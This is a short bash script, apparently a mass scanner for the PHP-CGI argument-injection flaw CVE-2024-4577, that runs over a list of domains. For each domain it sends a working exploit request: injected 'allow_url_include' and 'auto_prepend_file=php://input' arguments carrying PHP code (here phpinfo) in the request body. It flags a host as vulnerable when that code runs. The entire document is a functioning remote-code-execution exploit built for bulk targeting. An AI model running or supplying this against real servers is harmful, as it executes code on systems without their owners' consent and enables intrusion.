CVE-2024-4577.sh

#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
    local domain=$1
    local response=$(curl -s -X POST "${domain}/test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
        -H "User-Agent: curl/8.3.0" \
        -H "Accept: */*" \
        -H "Content-Length: 23" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Connection: keep-alive" \
        --data "<?php phpinfo(); ?>" \
        --max-time 10)

    if [[ $response == *"PHP Version"* ]]; then
        echo "$domain: Vulnerable"
    fi
}

# Main function to iterate over domains
main() {
    local file=$1
    while IFS= read -r domain || [ -n "$domain" ]; do
        check_vulnerability "$domain"
    done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <domain_list_file>"
    exit 1
fi

# Call the main function with the domain list file
main "$1"